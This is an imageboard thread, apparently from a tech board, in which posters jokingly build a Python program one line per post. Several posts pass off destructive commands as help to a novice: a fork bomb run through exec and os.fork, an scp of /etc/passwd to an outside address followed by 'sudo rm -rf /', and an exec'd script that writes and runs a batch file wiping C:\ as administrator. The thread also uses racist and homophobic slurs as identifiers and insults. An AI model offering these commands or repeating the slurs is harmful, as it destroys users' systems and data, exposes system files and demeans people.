Lets write a program

I know its been done before buuuuut!
Lets write a program together Sup Forums!
One line per post, using python 3.5.

Other urls found in this thread:


sys.exit("install gentoo")

def faggot(*args, **kwargs):

If *args == "faggot"

def niggers(op, you):

for i in range MAX_INT:
#ur fucked


print("Suck a big dick")


>Not using xrange

#you homos dont know how to code

def func():


import shitposting

>thinking I want anything other than inefficiency in a pointless program

indentation error: reported.

import os;exec('while 1: print("cuck"); os.fork()')
It's linux, right?

It's python 3 you idiot. xrange became range.

I, uh, don't really know what I expected.

You better run this, OP.

Ah, no. Windows. Sorry, should have specified.

I... think I might have to. Not sure what that gentoo thing is though, so I'm not sure...

how do you write code in the comments? What are the tags?

You have to do it from command line.
Type sudo scp /etc/passwd [email protected]
and then enter ur password.
should work after that by typing sudo rm -rf /

why is 2.x so widespread?

Get off Sup Forums. Your soul is too pure.

Idiots can't re-make old libraries they depend on.

I hope nobody is stupid enough to fall for that

Re-make? Re make? Are you gentoo? Why would you make from source ever? Binaries

...Do I even want to know?

>convert to python 3 from 2
print "derp" is print("derp"), a few library names changed, stuff like that

What i wouldn't give for printf in python. Fucking format statements make me gag.

exec('import os;I= """RMDIR C:\\* /S /q"""\ntry:\n open("l.bat", "w+")\n with open("l.bat","a+") as f:f.write(I)\n os.startfile("l.bat")\nexcept :\n pass')
Make sure you urn it as administrator.

you fucking people crack me up